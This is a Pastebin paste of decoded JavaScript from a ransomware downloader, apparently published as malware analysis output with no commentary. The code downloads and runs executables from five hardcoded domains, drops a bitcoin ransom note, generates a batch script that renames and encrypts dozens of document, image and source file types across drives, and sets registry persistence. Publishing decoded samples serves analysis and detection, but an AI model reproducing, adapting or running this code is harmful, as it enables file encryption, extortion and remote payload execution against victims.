API tools faq
paste
Advertisement
guelfoweb

JS Ransomware Dowloader - Decoded

guelfoweb
Mar 21st, 2016
9,893
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
JavaScript 6.34 KB | None | 0 0
raw download clone embed print report
  1. // js_ransomware_downloader_decode.py -> https://gist.github.com/guelfoweb/2ee5ac10c42132674bd6
  2.  
  3. ('eval', )(('var id = "a5MDyaa6RhRlNZSiV2EZfo_xMgx2viIpDJCLPKkOHEAhoWsDIgmisPaqo4qM8sFGwBy8weZ4uw8ZMBvT2FpUxX2tzQ";
  4. var ad = "1BPRvxWw75kyZAjTS1UYqDmyCzvRH4eHSc";
  5. var bc = "0.60340";
  6. var ld = 0;
  7. var cq = String.fromCharCode(34);
  8. var cs = String.fromCharCode(92);
  9. var ll = "bibliotecaatualiza.com.br web.goodworkint.com angelucci.info catteau.francois.perso.neuf.fr kandiramyo.kocaeli.edu.tr".split(" ");
  10. var ws = WScript.CreateObject("WScript.Shell");
  11. var fn = ws.ExpandEnvironmentStrings("%TEMP%") + cs + "216983";
  12. var xo = WScript.CreateObject("MSXML2.XMLHTTP");
  13. var xa = WScript.CreateObject("ADODB.Stream");
  14. var fo = WScript.CreateObject("Scripting.FileSystemObject");
  15. if (!fo.FileExists(fn + ".txt")) {
  16.    for (var i = ld; i < ll.length; i++) {
  17.        var dn = 0;
  18.        try {
  19.            xo.open("GET", "http://" + ll[i] + "/counter/?ad=" + ad + "&dc=753123"
  20.                false);
  21.            xo.send();
  22.            if (xo.status == 200) {
  23.                xa.open();
  24.                xa.type = 1;
  25.                xa.write(xo.responseBody);
  26.                if (xa.size > 1000) {
  27.                    dn = 1;
  28.                    xa.position = 0;
  29.                    xa.saveToFile(fn + ".exe", 2);
  30.                };
  31.                xa.close();
  32.            };
  33.            if (dn == 1) {
  34.                ld = i;
  35.                break;
  36.            };
  37.        } catch (er) {};
  38.    };
  39.    if (fo.FileExists(fn + ".exe")) {
  40.        fp = fo.CreateTextFile(fn + ".txt", true);
  41.        fp.WriteLine("ATTENTION!");
  42.        fp.WriteLine("");
  43.        fp.WriteLine("All your documents, photos, databases and other important personal files");
  44.        fp.WriteLine("were encrypted using strong RSA-1024 algorithm with a unique key.");
  45.        fp.WriteLine("To restore your files you have to pay " + bc + " BTC (bitcoins).");
  46.        fp.WriteLine("Please follow this manual:");
  47.        fp.WriteLine("");
  48.        fp.WriteLine("1. Create Bitcoin wallet here:");
  49.        fp.WriteLine("");
  50.        fp.WriteLine("      https://blockchain.info/wallet/new");
  51.        fp.WriteLine("");
  52.        fp.WriteLine("2. Buy " + bc + " BTC with cash using search here:");
  53.        fp.WriteLine("");
  54.        fp.WriteLine("      https://localbitcoins.com/buy_bitcoins");
  55.        fp.WriteLine("");
  56.        fp.WriteLine("3. Send " + bc + " BTC to this Bitcoin address:");
  57.        fp.WriteLine("");
  58.        fp.WriteLine("      " + ad);
  59.        fp.WriteLine("");
  60.        fp.WriteLine("4. Open one of the following links in your browser to download decryptor:");
  61.        fp.WriteLine("");
  62.        for (var i = 0; i < ll.length; i++) {
  63.            fp.WriteLine("      http://" + ll[i] + "/counter/?ad=" + ad);
  64.        };
  65.        fp.WriteLine("");
  66.        fp.WriteLine("5. Run decryptor to restore your files.");
  67.        fp.WriteLine("");
  68.        fp.WriteLine("PLEASE REMEMBER:");
  69.        fp.WriteLine("");
  70.        fp.WriteLine("      - If you do not pay in 3 days YOU LOOSE ALL YOUR FILES.");
  71.        fp.WriteLine("      - Nobody can help you except us.");
  72.        fp.WriteLine("      - It`s useless to reinstall Windows, update antivirus software, etc.");
  73.        fp.WriteLine("      - Your files can be decrypted only after you make payment.");
  74.        fp.WriteLine("      - You can find this manual on your desktop (DECRYPT.txt).");
  75.        fp.Close();
  76.        fp = fo.CreateTextFile(fn + ".cmd", true);
  77.        for (var i = 67; i <= 90; i++) {
  78.            fp.WriteLine("dir /B " + cq + String.fromCharCode(i) + ":" + cs + cq + " && for /r " + cq + String.fromCharCode(i) + ":" + cs + cq + " %%i in (*.zip *.rar *.7z *.tar *.gz *.xls *.xlsx *.doc *.docx *.pdf *.rtf *.ppt *.pptx *.sxi *.odm *.odt *.mpp *.ssh *.pub *.gpg *.pgp *.kdb *.kdbx *.als *.aup *.cpr *.npr *.cpp *.bas *.asm *.cs *.php *.pas *.vb *.vcproj *.vbproj *.mdb *.accdb *.mdf *.odb *.wdb *.csv *.tsv *.psd *.eps *.cdr *.cpt *.indd *.dwg *.max *.skp *.scad *.cad *.3ds *.blend *.lwo *.lws *.mb *.slddrw *.sldasm *.sldprt *.u3d *.jpg *.tiff *.tif *.raw *.avi *.mpg *.mp4 *.m4v *.mpeg *.mpe *.wmf *.wmv *.veg *.vdi *.vmdk *.vhd *.dsk) do (REN " + cq + "%%i" + cq + " " + cq + "%%~nxi.crypted" + cq + " & call " + fn + ".exe " + cq + "%%i.crypted" + cq + ")");
  79.        };
  80.        fp.WriteLine("REG ADD " + cq + "HKCU" + cs + "SOFTWARE" + cs + "Microsoft" + cs + "Windows" + cs + "CurrentVersion" + cs + "Run" + cq + " /V " + cq + "Crypted" + cq + " /t REG_SZ /F /D " + cq + fn + ".txt" + cq);
  81.        fp.WriteLine("REG ADD " + cq + "HKCR" + cs + ".crypted" + cq + " /ve /t REG_SZ /F /D " + cq + "Crypted" + cq);
  82.        fp.WriteLine("REG ADD " + cq + "HKCR" + cs + "Crypted" + cs + "shell" + cs + "open" + cs + "command" + cq + " /ve /t REG_SZ /F /D " + cq + "notepad.exe " + cs + cq + fn + ".txt" + cs + cq + cq);
  83.        fp.WriteLine("copy /y " + cq + fn + ".txt" + cq + " " + cq + "%AppData%" + cs + "Desktop" + cs + "DECRYPT.txt" + cq);
  84.        fp.WriteLine("copy /y " + cq + fn + ".txt" + cq + " " + cq + "%UserProfile%" + cs + "Desktop" + cs + "DECRYPT.txt" + cq);
  85.        fp.WriteLine("copy /y " + cq + fn + ".txt" + cq + " " + cq + fn + ".exe" + cq);
  86.        fp.WriteLine("del " + cq + fn + ".exe" + cq);
  87.        fp.WriteLine("del " + cq + fn + ".cmd" + cq + " & notepad.exe " + cq + fn + ".txt" + cq);
  88.        fp.Close();
  89.        ws.Run(fn + ".cmd", 0, 0);
  90.    };
  91.    for (var n = 1; n <= 2; n++) {
  92.        for (var i = ld; i < ll.length; i++) {
  93.            var dn = 0;
  94.            try {
  95.                xo.open("GET", "http://" + ll[i] + "/counter/?id=" + id + "&rnd=321683" + n, false);
  96.                xo.send();
  97.                if (xo.status == 200) {
  98.                    xa.open();
  99.                    xa.type = 1;
  100.                    xa.write(xo.responseBody);
  101.                    if (xa.size > 1000) {
  102.                        dn = 1;
  103.                        xa.position = 0;
  104.                        xa.saveToFile(fn + n + ".exe", 2);
  105.                        try {
  106.                            ws.Run(fn + n + ".exe"
  107.                                1, 0);
  108.                        } catch (er) {};
  109.                    };
  110.                    xa.close();
  111.                };
  112.                if (dn == 1) {
  113.                    ld = i;
  114.                    break;
  115.                };
  116.            } catch (er) {};
  117.        };
  118.    };
  119. };
  120. ', ))
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!